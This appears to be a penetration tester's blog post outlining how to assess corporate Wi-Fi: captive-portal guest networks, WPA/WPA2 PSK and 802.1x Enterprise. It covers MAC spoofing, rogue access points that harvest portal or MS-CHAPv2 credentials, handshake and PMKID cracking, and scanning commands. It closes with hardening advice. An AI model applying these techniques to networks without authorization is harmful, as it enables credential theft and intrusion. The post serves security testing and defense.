Improperly configured wireless networks are often an easy way into a target network. Testing of these networks is frequently overlooked despite the fact that they are common in corporate environments and usually offer direct access to internal network segments. Granted, some configurations of wireless networks are currently “impenetrable,” however, literally a single missing setting (certificate validation server-side and client-side) can be the bane of an enterprise wireless network. The Aircrack-ng suite and Kismet are the defacto standards in assessing wireless networks and both can give you information on the networks in range, their encryption, authentication, connected clients, and more.

What this blog will cover:

  • A brief outline of several wireless configuration scenarios and a high-level overview of testing these networks from a security standpoint.

What this blog won’t cover:

  • Much older and highly insecure protocols such as WEP – just don’t use it.
  • Particularly disruptive techniques (e.g. Karma).
  • Key reinstallation attacks (KRACK) are not covered in depth in this post as they might not be the most feasible attack in a short wireless engagement, although determining whether access points (APs) are vulnerable to the KRACK attack would be valuable information.

Note that this post is for educational purposes only and should not be used, under any circumstances, on networks that you do not own.

Open Networks

Most companies have an open network with some sort of captive portal for guest access. These setups often use a “Walled Garden” and don’t allow any sort of Internet access before you authenticate through the captive portal, and spoofing the captive portal of a guest network is likely not worth the time on a wireless engagement.

Since you still connect to the network and receive an IP address on most open guest networks with captive portals, here are some things to try:

MAC Spoofing – Some wireless networks employ MAC address filtering that only allows whitelisted devices the ability to connect. After surveying the wireless network to find connected clients using Airodump-ng, use macchanger or ifconfig to change your MAC address to that of a connected client and try connecting to the wireless network to see if you have further access to the network. Some access points will notice a connection attempt from a device with the same MAC address as an already connected device and will take measures to prevent it. In this case, try deauthenticating the connected client using Aireplay-ng before attempting your connection.

Brute-force Attacks – If time allows, you might attempt to brute-force the captive portal authentication using Hydra, Medusa, or something similar. Gaining access to the captive portal may or may not be fruitful or worth the time on a short engagement. Make sure to also test for default and easily guessable credentials, such as “admin” as the username and password.

Client Isolation – Check for a lack of client isolation while not authenticated to the guest network captive portal. I have seen configurations where other devices on the network were accessible before captive portal authentication, including vulnerable corporate devices that were accidentally connected to the guest network from which I was able to exploit and gather corporate network credentials. However, take care to make sure you can connect to the device as some captive portals will redirect any traffic over port 80 TCP to the captive portal itself, which might create the illusion that the port is open on the device you are port scanning.

  • Nmap “Ping Scan” – This scan will perform several actions to discover hosts on a local network, including ICMP echo requests and ARP requests:
    • nmap -sn 192.168.0.0/24
  • Masscan – A very fast scan that can aid in scanning large subnets. I will normally scan all private IP address ranges on specific ports like SMB over port 445/TCP, and HTTP/HTTPS over 80/TCP and 443/TCP provided the captive portal is not redirecting traffic on those ports. Be careful with the “–rate” flag.
    • masscan 192.168.0.0/16 -p80,443,445 –-rate 100000
    • masscan 10.0.0.0/8 -p80,443,445 –-rate 100000
    • masscan 172.16.0.0/12 -p80,443,445 –-rate 100000

Captive Portal Spoofing – Make a clone of the captive portal while connected to the network. Serve the cloned web page from your attacking machine and spin up a rogue access point that mimics the target network. When a victim connects, their attempted web traffic is redirected to your cloned captive portal and, ideally, they enter valid credentials for the guest portal. This can be used against any network with a captive portal, not just guest networks.

  • Captive portal attack: There are many ways to perform captive portal attacks, but I prefer to use Eaphammer (https://github.com/s0lst1c3/eaphammer#v—performing-captive-portal-attacks) as it includes several other wireless attacks built in.
    • Clone captive portal – You can clone the captive portal using several methods, including saving the page in your web browser or by using wget.
    • Perform captive portal attack – Ensure your cloned web page exists in the /var/www/html/ directory where Eaphammer serves the webpage according to the default Apache2 configuration. Run Eaphammer with the “–captive-portal” flag to create the rogue access point mimicking the target network. With any luck, clients will connect and enter their legitimate credentials into your spoofed captive portal. Make sure to have a packet capture running during this attack to capture authentication attempts against the portal. The bssid parameter is the MAC address of the AP you are spoofing.
  • Hostile portal attack: This attack uses Eaphammer (https://github.com/s0lst1c3/eaphammer#v—performing-captive-portal-attacks) as well and is similar to the captive portal attack, but instead of redirecting the user to the captive portal, it redirects the user’s traffic to a SMB share on the attacking machine, also known as a “Redirect to SMB” attack. This attack causes the victim’s machine to attempt to authenticate to the SMB share on the attacking machine, which could produce NetNTLMv1/v2 hashes for the corporate network that can be cracked offline.

DNS Tunneling – Most guest networks don’t restrict or monitor DNS traffic. The captive portal can essentially be bypassed to allow Internet access by tunneling traffic over DNS to a server you control. While this may not be critical on a guest network environment, it still allows for the bypass of in-place portal mechanisms and is a common method of data exfiltration and malware command and control traffic.

  • Iodine and DNSCat are a few DNS tunneling tools. Setting DNS tunneling up for the first time can be a bit cumbersome, but I prefer using Iodine and the process can be found on Iodine’s Github page. (https://github.com/yarrick/iodine)

WPA/WPA2 Pre-Shared Key (PSK)

Attacking networks utilizing PSKs is straightforward. The main goal in this attack is to obtain the hashed PSK that you can attempt to crack offline. A majority of networks are using this configuration and while the inherent vulnerability of capturing the handshake and PMKID exists, it does not ensure access as a lengthy passphrase (i.e. 25 characters or more), with current technology, can prevent the PSK from being brute-forced in a reasonable timeframe (years).

  • Capturing WPA Handshake: This is the classic way to attack networks utilizing PSK authentication. This attack relies on capturing the 4-way handshake that takes place when clients authenticate and associate to the access point. The handshake can be captured using Airodump-ng after placing your wireless card in monitor mode using Airmon-ng. Make sure to specify the channel, BSSID, and ESSID while running Airodump-ng as it will channel hop otherwise, potentially missing all or part of the handshake. Airodump-ng’s output will tell you when you’ve captured the handshake at the top right of its window. You can speed this process up by deauthenticating a client connected to the target network using Aireplay-ng. The handshake contains the hashed PSK that we can crack offline using Aircrack-ng or Hashcat. Hashcat is my preferred method as it utilizes GPUs for faster cracking. Use hash type 2500 when cracking WPA PSKs with Hashcat. As this type of attack requires wireless datagrams from both the AP and the client, physical proximity will increase the likelihood of capturing the full 4-way handshake.
  • WiFi Protected Setup (WPS): WPS is a feature on most wireless routers and access points that promotes “convenience” by allowing users to connect to the network using only a PIN or the push of a button. This feature is highly insecure because the 8-digit PIN has a finite number of permutations and can be brute-forced using tools like Reaver with a near 100% success rate. This feature should be disabled on all wireless routers and access points.
  • PMKID Attack: This attack was announced by the Hashcat team in 2018 and makes attacking PSK networks even easier, since it doesn’t require capture of the 4-way handshake and thus does not require connected clients, which can often times be a burden when testing some wireless networks. The attack gathers the PMKID directly from the access point and can be cracked using hash mode 16800 with Hashcat. While this attack vector is easier, it will not speed up cracking of the PSK.

WPA/WPA2 Enterprise

Enterprise wireless networks (802.1x) currently provide the best security for a wireless network IF configured correctly. These networks utilize a backend authentication server (normally RADIUS) and validate connecting clients using a username and password combination or certificates. Enterprise wireless networks can be configured with several forms of the Extensible Authentication Protocol (EAP), such as Protected EAP (PEAP), EAP-TLS, and EAP-TTLS, among other much older protocols, such as LEAP. These protocols encrypt inner-authentication attempts (normally with MS-CHAPv2) in a TLS tunnel. However, misconfiguration of these networks can make them arguably worse than a PSK network.

  • Attacking PEAP: PEAP authentication sends the authenticating username in cleartext BEFORE establishing the TLS tunnel for the rest of the authentication process. These usernames live within EAP Identity Response messages that can be sniffed using tcpdump, Airodump-ng, Wireshark, or specialized tools such as crEAP.py (https://github.com/Shellntel/scripts/blob/master/crEAP.py). Your wireless card should be in monitor mode when using those tools unless the tool does it for you (crEAP.py). Usernames gathered from this method can be used in brute-force attacks against the network. PEAP can also be attacked by deploying a rogue access point (using Eaphammer, Mana, etc.) mimicking the target network and forcing clients to connect to your attacking machine, revealing their MS-CHAPv2 hashed password. MS-CHAPv2 was found to be cryptographically insecure and trivial to crack.
  • Attacking EAP-TTLS: EAP-TTLS networks encrypt all parts of the authentication attempt, including the username, so sniffing the usernames of these networks are not possible. However, as mentioned previously, EAP-TTLS networks that do not utilize client and server certificate validation are susceptible to rogue access point attacks similar to PEAP.
  • EAP-TLS: Using EAP-TLS on an 802.1x enterprise network is currently (before mass implementation of WPA3) the most secure way to deploy a wireless network. This method also encrypts the entire authentication procedure between the supplicant, authenticator, and authentication server, but it enforces certificate validation between the client and the server, unlike other EAP protocols that may support it but don’t enforce it by default. The result is that clients configured with this type of network won’t connect to your rogue access point, and thus, no credentials. So far, attacking these networks is largely unfruitful.

There are multiple configuration possibilities for wireless networks, many of which aren’t even shown here, and many have vulnerabilities. One single misconfiguration can be disastrous for a wireless network, especially an 802.1x enterprise network where the compromise of a user’s MS-CHAPv2 hashed credentials, when cracked, essentially leads to access to the target network and domain, not just a passphrase as used in a PSK network. It’s important to note that while using an 802.1x enterprise wireless configuration is currently the most secure method, ensuring insecure EAP types are disabled is critical. Only EAP-TLS should be used on secure wireless networks if possible.